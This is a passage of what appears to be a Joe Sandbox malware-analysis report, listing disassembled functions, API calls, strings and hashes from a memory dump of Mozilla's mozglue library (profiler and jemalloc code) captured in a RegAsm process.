                                                                                    • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                    • String ID: D
                                                                                    • API String ID: 290179723-2746444292
                                                                                    • Opcode ID: 17f3c33dab42415bbbdfb477c059f26955a2a9a5b17e38e85e8603fb0c094f26
                                                                                    • Instruction ID: 990afd724dedc342e17163a4ffac8814940ef43b4b81dace2166a29c3f405f3a
                                                                                    • Opcode Fuzzy Hash: 17f3c33dab42415bbbdfb477c059f26955a2a9a5b17e38e85e8603fb0c094f26
                                                                                    • Instruction Fuzzy Hash: 93F1B471E003259FEB209F65CD48B9AB7B8FF49728F1141A5E909A7640D7B4ED80CF94
                                                                                    APIs
                                                                                      • Part of subcall function 6C707090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C70B9F1,?), ref: 6C707107
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C70DCF5), ref: 6C70E92D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EA4F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EA5C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EA80
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EA8A
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C70DCF5), ref: 6C70EA92
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EB11
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EB1E
                                                                                    • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C70EB3C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EB5B
                                                                                      • Part of subcall function 6C705710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C70EB71), ref: 6C7057AB
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EBA4
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C70EBAC
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EBC1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000), ref: 6C70EBCE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C70EBE5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8,00000000), ref: 6C70EC37
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C70EC46
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C70EC55
                                                                                    • free.MOZGLUE(00000000), ref: 6C70EC5C
                                                                                    Strings
                                                                                    • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C70EA9B
                                                                                    • [I %d/%d] profiler_start, xrefs: 6C70EBB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                    • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                    • API String ID: 1341148965-1186885292
                                                                                    • Opcode ID: 6ace64b440ac9f633860b10a581aa05a5259fd787950e6decd676a36b63236b7
                                                                                    • Instruction ID: 855644a0e6f366e2b15fe12feb5339e60e91d038fad626cf316d9eb8d0746846
                                                                                    • Opcode Fuzzy Hash: 6ace64b440ac9f633860b10a581aa05a5259fd787950e6decd676a36b63236b7
                                                                                    • Instruction Fuzzy Hash: 0CA117B17006049FDB10AF68D548BAA77F5FF8631CF14813BE96987B41DB70A805CBA5
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F70E
                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C70F8F9
                                                                                      • Part of subcall function 6C6D6390: GetCurrentThreadId.KERNEL32 ref: 6C6D63D0
                                                                                      • Part of subcall function 6C6D6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6D63DF
                                                                                      • Part of subcall function 6C6D6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6D640E
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F93A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F98A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F990
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F994
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F716
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                      • Part of subcall function 6C6CB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C6CB5E0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F739
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F746
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F793
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C74385B,00000002,?,?,?,?,?), ref: 6C70F829
                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6C70F84C
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C70F866
                                                                                    • free.MOZGLUE(?), ref: 6C70FA0C
                                                                                      • Part of subcall function 6C6D5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D5E8C
                                                                                      • Part of subcall function 6C6D5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5E9D
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentThreadId.KERNEL32 ref: 6C6D5EAB
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentThreadId.KERNEL32 ref: 6C6D5EB8
                                                                                      • Part of subcall function 6C6D5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5ECF
                                                                                      • Part of subcall function 6C6D5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C6D5F27
                                                                                      • Part of subcall function 6C6D5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C6D5F47
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentProcess.KERNEL32 ref: 6C6D5F53
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentThread.KERNEL32 ref: 6C6D5F5C
                                                                                      • Part of subcall function 6C6D5E60: GetCurrentProcess.KERNEL32 ref: 6C6D5F66
                                                                                      • Part of subcall function 6C6D5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6D5F7E
                                                                                    • free.MOZGLUE(?), ref: 6C70F9C5
                                                                                    • free.MOZGLUE(?), ref: 6C70F9DA
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C70F9A6
                                                                                    • Thread , xrefs: 6C70F789
                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6C70F71F
                                                                                    • " attempted to re-register as ", xrefs: 6C70F858
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                    • API String ID: 882766088-1834255612
                                                                                    • Opcode ID: 433fb69097314bc99f721e138520af1369668aee352ef0cc74fb178ced46b59a
                                                                                    • Instruction ID: 78fb8ae6f771886e61713990ec24cd5d158ab946f5c6be9935a5c2dab0ca88ab
                                                                                    • Opcode Fuzzy Hash: 433fb69097314bc99f721e138520af1369668aee352ef0cc74fb178ced46b59a
                                                                                    • Instruction Fuzzy Hash: 688116B16047009FD700DF24C944AAEB7E5FFC6308F41856EE85997751EB30A909CBAA
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EE60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EE6D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EE92
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C70EEA5
                                                                                    • CloseHandle.KERNEL32(?), ref: 6C70EEB4
                                                                                    • free.MOZGLUE(00000000), ref: 6C70EEBB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EEC7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70EECF
                                                                                      • Part of subcall function 6C70DE60: GetCurrentThreadId.KERNEL32 ref: 6C70DE73
                                                                                      • Part of subcall function 6C70DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C6D4A68), ref: 6C70DE7B
                                                                                      • Part of subcall function 6C70DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C6D4A68), ref: 6C70DEB8
                                                                                      • Part of subcall function 6C70DE60: free.MOZGLUE(00000000,?,6C6D4A68), ref: 6C70DEFE
                                                                                      • Part of subcall function 6C70DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C70DF38
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EF1E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EF2B
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EF59
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EFB0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EFBD
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70EFE1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70EFF8
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F000
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C70F02F
                                                                                      • Part of subcall function 6C70F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C70F09B
                                                                                      • Part of subcall function 6C70F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C70F0AC
                                                                                      • Part of subcall function 6C70F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C70F0BE
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_stop, xrefs: 6C70EED7
                                                                                    • [I %d/%d] profiler_pause, xrefs: 6C70F008
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                    • API String ID: 16519850-1833026159
                                                                                    • Opcode ID: b5d49f73169d63e7c0d1aca91fec09a03aefdbd9cecdb17dca3d94807cec50b5
                                                                                    • Instruction ID: c43df532af7136a66ee5ef4905af1c54f91fe28f5ceb72cf2604fdc02e5322e8
                                                                                    • Opcode Fuzzy Hash: b5d49f73169d63e7c0d1aca91fec09a03aefdbd9cecdb17dca3d94807cec50b5
                                                                                    • Instruction Fuzzy Hash: 3351F7B57046189FDB007BA9D508BAA77F8EB4632CF10C577E97583B40DB706804C7A6
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74E804), ref: 6C6FD047
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6FD093
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6FD0A6
                                                                                    • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C74E810,00000040), ref: 6C6FD0D0
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E7B8,00001388), ref: 6C6FD147
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E744,00001388), ref: 6C6FD162
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E784,00001388), ref: 6C6FD18D
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74E7DC,00001388), ref: 6C6FD1B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                    • API String ID: 2957312145-326518326
                                                                                    • Opcode ID: 0625f9044e6da322e30aa8f12df78ed16011464931876b10b44bcc2dcfa67259
                                                                                    • Instruction ID: fcad2d77b4b89a5ec0083c91b12f5e0059e08117e87e19ddd95aeb0245240a49
                                                                                    • Opcode Fuzzy Hash: 0625f9044e6da322e30aa8f12df78ed16011464931876b10b44bcc2dcfa67259
                                                                                    • Instruction Fuzzy Hash: 7481E770B042089BEB01EF79C944B69B7FAEB5633CF10813AE52197B40D775A806CBD5
                                                                                    APIs
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C6D8007
                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C6D801D
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C6D802B
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C6D803D
                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C6D808D
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C6D809B
                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C6D80B9
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6D80DF
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D80ED
                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D80FB
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D810D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6D8133
                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C6D8149
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C6D8167
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C6D817C
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D8199
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                    • String ID: 0>pl
                                                                                    • API String ID: 2721933968-2493627298
                                                                                    • Opcode ID: 50b8068e5e32fbd18e2650e530d0c2999bc43c939cc76d122f7c9aa45daef13e
                                                                                    • Instruction ID: 505a8f46272a35fc3ff1898586c2506705b1dfc4a94c458d932fa20a31bfe256
                                                                                    • Opcode Fuzzy Hash: 50b8068e5e32fbd18e2650e530d0c2999bc43c939cc76d122f7c9aa45daef13e
                                                                                    • Instruction Fuzzy Hash: 7A51A6B2E001149BDB00DBA9DC889EFB7B9EF4D324F154125E815E7751E730AD09CBA5
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5E9D
                                                                                      • Part of subcall function 6C6E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B85
                                                                                      • Part of subcall function 6C6E5B50: EnterCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B90
                                                                                      • Part of subcall function 6C6E5B50: LeaveCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5BD8
                                                                                      • Part of subcall function 6C6E5B50: GetTickCount64.KERNEL32 ref: 6C6E5BE4
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D5EAB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D5EB8
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6D5ECF
                                                                                    • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C6D6017
                                                                                      • Part of subcall function 6C6C4310: moz_xmalloc.MOZGLUE(00000010,?,6C6C42D2), ref: 6C6C436A
                                                                                      • Part of subcall function 6C6C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6C42D2), ref: 6C6C4387
                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6C6D5F47
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D5F53
                                                                                    • GetCurrentThread.KERNEL32 ref: 6C6D5F5C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C6D5F66
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C6D5F7E
                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6C6D5F27
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D5E8C
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D605D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6D55E1), ref: 6C6D60CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                    • String ID: GeckoMain
                                                                                    • API String ID: 3711609982-966795396
                                                                                    • Opcode ID: 04fd2f642d05b44047301a45531ea95bc9e674b9797d86316e07460560d8fac1
                                                                                    • Instruction ID: e788c63ae4a8d14ed672d3c7b1b4593ec1e23c84516eaddefd23436fe4529a70
                                                                                    • Opcode Fuzzy Hash: 04fd2f642d05b44047301a45531ea95bc9e674b9797d86316e07460560d8fac1
                                                                                    • Instruction Fuzzy Hash: BA71E5B06057409FD710DF29C580A6ABBF0FF9A308F14496EE4968BB52D731F948CB96
                                                                                    APIs
                                                                                      • Part of subcall function 6C6C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C6C3217
                                                                                      • Part of subcall function 6C6C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C6C3236
                                                                                      • Part of subcall function 6C6C31C0: FreeLibrary.KERNEL32 ref: 6C6C324B
                                                                                      • Part of subcall function 6C6C31C0: __Init_thread_footer.LIBCMT ref: 6C6C3260
                                                                                      • Part of subcall function 6C6C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C6C327F
                                                                                      • Part of subcall function 6C6C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6C328E
